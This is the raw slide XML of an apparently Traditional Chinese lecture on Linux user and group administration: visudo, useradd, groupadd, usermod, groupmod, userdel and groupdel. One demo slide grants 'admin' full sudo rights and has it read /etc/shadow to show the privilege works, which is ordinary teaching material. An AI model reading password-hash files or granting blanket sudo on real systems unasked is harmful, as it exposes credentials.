            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudoers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en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>root@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>~]#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>visudo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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root      ALL=(ALL)     ALL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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>預設值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin   ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=(ALL)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>←</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>admin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 smtClean="0"/>
              <a:t>visudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> 修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a: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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW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851040" y="673200"/>
              <a:ext cx="2318040" cy="702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35200" y="609480"/>
                <a:ext cx="234972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927000" y="4102200"/>
              <a:ext cx="6134400" cy="3178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11160" y="4038480"/>
                <a:ext cx="6166440" cy="44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409760" y="539640"/>
              <a:ext cx="6134400" cy="146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93920" y="476280"/>
                <a:ext cx="616608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879560" y="2724120"/>
              <a:ext cx="552960" cy="45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863720" y="2660760"/>
                <a:ext cx="58464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603520" y="1504800"/>
              <a:ext cx="4724640" cy="702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587680" y="1441440"/>
                <a:ext cx="475632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057400" y="2787480"/>
              <a:ext cx="87660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041560" y="2724120"/>
                <a:ext cx="90828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847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/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>完畢後試試</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>admin@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>~]#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t> tail –n 1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>發現</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>居然可以查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>shadow!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="28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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a: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2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684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5"/>
            <a:ext cx="8568952" cy="4859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：新增一個使用者帳號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>使用者帳號名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r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u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：指定一個使用者一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>UID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：指定初始群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>GID(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>必須存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：只建立使用者，不建立家目錄。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：建立家目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>：指定使用者家目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="36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新增使用者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781200" y="1517760"/>
              <a:ext cx="1111320" cy="702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5000" y="1454040"/>
                <a:ext cx="114336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149480" y="3219480"/>
              <a:ext cx="26676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33640" y="3156120"/>
                <a:ext cx="2988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841400" y="3162240"/>
              <a:ext cx="4197960" cy="1530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25560" y="3098880"/>
                <a:ext cx="4229640" cy="27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066680" y="3740040"/>
              <a:ext cx="36864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50840" y="3676680"/>
                <a:ext cx="400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936800" y="3759120"/>
              <a:ext cx="3594240" cy="216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920960" y="3695760"/>
                <a:ext cx="3626280" cy="3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092240" y="4552920"/>
              <a:ext cx="476640" cy="259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76400" y="4489560"/>
                <a:ext cx="5083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2495520" y="4667400"/>
              <a:ext cx="1346760" cy="381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479680" y="4603680"/>
                <a:ext cx="13784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429000" y="4654440"/>
              <a:ext cx="3251520" cy="702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413160" y="4591080"/>
                <a:ext cx="328320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066680" y="5086440"/>
              <a:ext cx="578160" cy="511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50840" y="5022720"/>
                <a:ext cx="6102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886040" y="5137200"/>
              <a:ext cx="2584800" cy="194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870200" y="5073480"/>
                <a:ext cx="261648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079640" y="5613480"/>
              <a:ext cx="501840" cy="129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63800" y="5549760"/>
                <a:ext cx="5335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955880" y="5689440"/>
              <a:ext cx="2121120" cy="194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940040" y="5626080"/>
                <a:ext cx="215280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3587760" y="679320"/>
              <a:ext cx="2330640" cy="1209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571920" y="615960"/>
                <a:ext cx="2362680" cy="248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8101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5"/>
            <a:ext cx="8568952" cy="4859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：新增一個群組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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty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參數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群組名稱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 smtClean="0"/>
              <a:t>-g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：後面接某個特定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>，用來直接給予某個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>GID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>-r : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>系統群組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新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>組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3624840" y="672840"/>
              <a:ext cx="2665440" cy="3006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09000" y="609120"/>
                <a:ext cx="2697120" cy="42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10000" y="1639440"/>
              <a:ext cx="1267560" cy="262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4160" y="1575720"/>
                <a:ext cx="1299240" cy="15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0210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400" dirty="0" err="1"/>
              <a:t>usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>可以修改一個使用者帳號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty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使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>]</a:t>
            </a:r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g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：後面接初始群組，修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的第四個欄位，也是是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的欄位。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：後面接次要群組，修改這個使用者能夠支援的群組，修改的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：只修改使用者名稱</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="34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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數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76240" y="1606680"/>
              <a:ext cx="1486440" cy="194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0400" y="1542960"/>
                <a:ext cx="15181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127240" y="2152800"/>
              <a:ext cx="166392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11400" y="2089080"/>
                <a:ext cx="16959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172040" y="2216160"/>
              <a:ext cx="5972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156200" y="2152800"/>
                <a:ext cx="6289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340240" y="2216160"/>
              <a:ext cx="673560" cy="12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324400" y="2152800"/>
                <a:ext cx="7052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6591240" y="2178000"/>
              <a:ext cx="952920" cy="320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575400" y="2114640"/>
                <a:ext cx="9846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244520" y="3352680"/>
              <a:ext cx="400320" cy="194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28680" y="3289320"/>
                <a:ext cx="4323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200400" y="3397320"/>
              <a:ext cx="1162440" cy="19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184560" y="3333600"/>
                <a:ext cx="11941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1181160" y="4362480"/>
              <a:ext cx="635400" cy="511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165320" y="4299120"/>
                <a:ext cx="66708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3130560" y="4438800"/>
              <a:ext cx="1187640" cy="255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114720" y="4375080"/>
                <a:ext cx="121968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5168880" y="3378240"/>
              <a:ext cx="2476800" cy="129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153040" y="3314880"/>
                <a:ext cx="25084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876920" y="3848040"/>
              <a:ext cx="692280" cy="320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861080" y="3784680"/>
                <a:ext cx="7239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5238720" y="4356000"/>
              <a:ext cx="2959560" cy="1720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5222880" y="4292640"/>
                <a:ext cx="2991240" cy="29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1574640" y="4870440"/>
              <a:ext cx="1251360" cy="385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558800" y="4807080"/>
                <a:ext cx="12830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1295280" y="5460840"/>
              <a:ext cx="286200" cy="684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279440" y="5397480"/>
                <a:ext cx="3178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5035680" y="4844880"/>
              <a:ext cx="1517760" cy="831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019840" y="4781520"/>
                <a:ext cx="154944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2806560" y="628560"/>
              <a:ext cx="4807440" cy="4892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2790720" y="565200"/>
                <a:ext cx="4839120" cy="61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8819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400" dirty="0" err="1" smtClean="0"/>
              <a:t>groupmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>可以修改群組相關參數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>groupmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean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參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>組名稱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endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項與參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-g  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：修改既有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>數字。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>[-g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：修改既有的群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>名稱。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>[-n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>group_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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修改群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數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2900160" y="613800"/>
              <a:ext cx="1933560" cy="853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83960" y="550440"/>
                <a:ext cx="196560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005840" y="1593720"/>
              <a:ext cx="1626840" cy="720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90000" y="1530000"/>
                <a:ext cx="1658520" cy="19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047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userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>刪除一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>使用者帳號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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 err="1" smtClean="0"/>
              <a:t>userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean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參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>使用者帳號名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty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 smtClean="0"/>
              <a:t>-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：連使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>目錄一起刪除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400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移除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>使用者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635040" y="1555920"/>
              <a:ext cx="1663920" cy="446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9200" y="1492200"/>
                <a:ext cx="16956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384200" y="3409920"/>
              <a:ext cx="298800" cy="576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68360" y="3346560"/>
                <a:ext cx="3304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203560" y="3384720"/>
              <a:ext cx="3721320" cy="381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187720" y="3321000"/>
                <a:ext cx="375300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479760" y="685800"/>
              <a:ext cx="2661120" cy="57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463920" y="622440"/>
                <a:ext cx="2692800" cy="18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6765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groupdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可以刪除一個群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>組</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>groupdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>群組名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000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移除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
